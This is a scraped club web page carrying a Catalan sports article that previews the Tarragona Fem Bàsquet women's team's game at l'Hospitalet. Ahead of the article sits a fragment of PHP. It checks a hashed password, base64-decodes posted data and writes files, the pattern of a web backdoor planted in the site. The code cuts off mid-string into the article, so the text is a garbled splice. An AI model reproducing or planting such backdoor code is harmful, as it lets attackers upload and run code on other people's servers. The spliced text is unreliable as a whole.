function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Rematar la feina, objectiu del Tarragona Fem Bàsquet a la pista de l'Hospitalet - Tgn Bàsquet Club -

Rematar la feina, objectiu del Tarragona Fem Bàsquet a la pista de l’Hospitalet

By
Updated: novembre 6, 2015

“No estem finalitzant bé els partits”. L’entrenador del Tarragona Fem Bàsquet, Albert del Rey, veu com la feina de tres quartes parts de cada matx se’n va en orris perquè en l’últim període l’equip perd l’avantatge i encaixa una derrota rere una altra. Així va passar contra el Bencriada, el Ploms i el Cerdanyola. Tres partits que podrien haver estat tres victòries i deixarien el conjunt lila amb un balanç de 4 i 3. Però no. La classificació mostra com el Tarragona Fem Bàsquet és el cuer del grup 2 amb 1 victòria (contra el JET Terrassa) i 6 derrotes, a un triomf del penúltim, el Ploms i a dues d’un grup nombrós d’equips entre els quals es troba el rival de demà dissabte, l’Hospitalet (19.30 h).

La visita a la pista d’aquest conjunt podria considerar-se propícia perquè es tracta d’un equip que, com el tarragoní, va aconseguir l’ascens la temporada passada. Amb tot, l’Hospitalet està fent la seva feina i ja porta tres victòries. El seu joc es fonamenta en la base Portillo, autèntic referent de l’equip i per on passen totes les possibilitats de victòria del conjunt del Barcelonès. Dins la zona, tot i no tenir una jugadora decisiva, disposa de tres interiors fortes que dificultaran el joc al pal baix de Fouty que, previsiblement, haurà de superar les defenses dos contra un quan es trobi d’esquena al cèrcol. En defensa, l’Hospitalet fa alternatives, combinant estones d’individual amb pressió a tota la pista i zona en moments puntuals. “Hem de ser mentalment fortes, saber que és una lliga on s’ha de jugar amb concentració els quaranta minuts perquè si no, perds els partits”, remarca Del Rey que apel·la a la defensa per controlar el partit: “En els últims deu minuts fallem tirs fàcils, aquesta manca d’encert ens porta a la derrota. Hem de construir el nostre avantatge des de la solidesa defensiva”.

El tècnic lila recupera Anna Pocino dins la zona però perdrà gairebé amb seguretat el seu referent en aquest inici de temporada, la base Laura Pascual, que es troba malalta. Amb tot, Pasku viatjarà amb l’equip.

Deixa un comentari

L'adreça electrònica no es publicarà. Els camps necessaris estan marcats amb *